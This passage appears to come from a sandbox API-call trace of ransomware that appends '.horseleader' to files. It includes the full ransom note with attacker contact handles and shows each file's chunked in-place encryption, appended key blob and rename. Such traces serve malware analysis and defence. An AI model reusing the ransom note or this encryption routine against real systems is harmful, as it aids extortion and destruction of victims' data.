dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0173.005] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0173.005] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0173.007] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0173.007] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0173.007] CloseHandle (hObject=0x21c) returned 1 [0173.007] GetProcessHeap () returned 0x780000 [0173.008] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0173.008] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0173.008] lstrcmpiW (lpString1="Proof.es", lpString2="Windows") returned -1 [0173.008] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned 75 [0173.008] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0173.008] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0173.008] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0173.008] GetProcessHeap () returned 0x780000 [0173.008] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0173.008] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*") returned 77 [0173.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0173.009] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0173.009] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\.") returned 77 [0173.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0173.009] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="..", cAlternateFileName="")) returned 1 [0173.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0173.010] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\..") returned 78 [0173.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0173.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0173.010] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0173.010] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0173.010] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0173.010] StrStrIW (lpFirst="Proof.cab", lpSrch=".horseleader") returned 0x0 [0173.010] lstrcmpW (lpString1="Proof.cab", lpString2="#Decrypt#.txt") returned 1 [0173.010] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0173.011] lstrlenW (lpString=".testttjffg") returned 11 [0173.011] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpSrch=".testttjffg") returned 0x0 [0173.011] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0173.011] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0173.011] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0173.012] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0173.012] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0173.012] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13642474) returned 1 [0173.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.013] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.077] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.081] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.081] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x67ed75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.082] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.085] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.085] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.085] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xcfdaea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.085] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.093] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0173.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.095] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0173.096] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0173.096] CloseHandle (hObject=0x158) returned 1 [0175.474] GetProcessHeap () returned 0x780000 [0175.474] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0175.474] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.horseleader") returned 97 [0175.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.horseleader")) returned 1 [0175.476] GetProcessHeap () returned 0x780000 [0175.476] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0175.476] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e5c7f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd7200, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0175.476] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0175.476] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0175.477] StrStrIW (lpFirst="Proof.msi", lpSrch=".horseleader") returned 0x0 [0175.477] lstrcmpW (lpString1="Proof.msi", lpString2="#Decrypt#.txt") returned 1 [0175.477] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0175.477] lstrlenW (lpString=".testttjffg") returned 11 [0175.477] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi", lpSrch=".testttjffg") returned 0x0 [0175.477] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0175.477] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0175.477] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0175.478] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0175.478] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0175.478] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=881152) returned 1 [0175.478] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.478] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0176.018] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.018] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0176.019] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x69100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.019] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0180.790] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.791] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0180.792] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd2200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.792] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0181.102] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0181.102] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0181.103] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.103] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0181.104] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0181.104] CloseHandle (hObject=0x158) returned 1 [0181.466] GetProcessHeap () returned 0x780000 [0181.466] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0181.466] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.horseleader") returned 97 [0181.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.horseleader")) returned 1 [0181.471] GetProcessHeap () returned 0x780000 [0181.471] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0181.471] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0181.472] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0181.472] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0181.472] StrStrIW (lpFirst="Proof.xml", lpSrch=".horseleader") returned 0x0 [0181.472] lstrcmpW (lpString1="Proof.xml", lpString2="#Decrypt#.txt") returned 1 [0181.472] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0181.472] lstrlenW (lpString=".testttjffg") returned 11 [0181.472] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml", lpSrch=".testttjffg") returned 0x0 [0181.472] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0181.473] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0181.473] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0181.473] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0181.473] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0181.474] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1457) returned 1 [0181.474] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5b1, lpOverlapped=0x0) returned 1 [0181.561] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0181.562] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5b1, lpOverlapped=0x0) returned 1 [0181.562] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.562] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0181.562] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0181.562] CloseHandle (hObject=0x158) returned 1 [0181.565] GetProcessHeap () returned 0x780000 [0181.565] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0181.565] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.horseleader") returned 97 [0181.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.horseleader")) returned 1 [0181.571] GetProcessHeap () returned 0x780000 [0181.571] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0181.571] FindNextFileW (in: 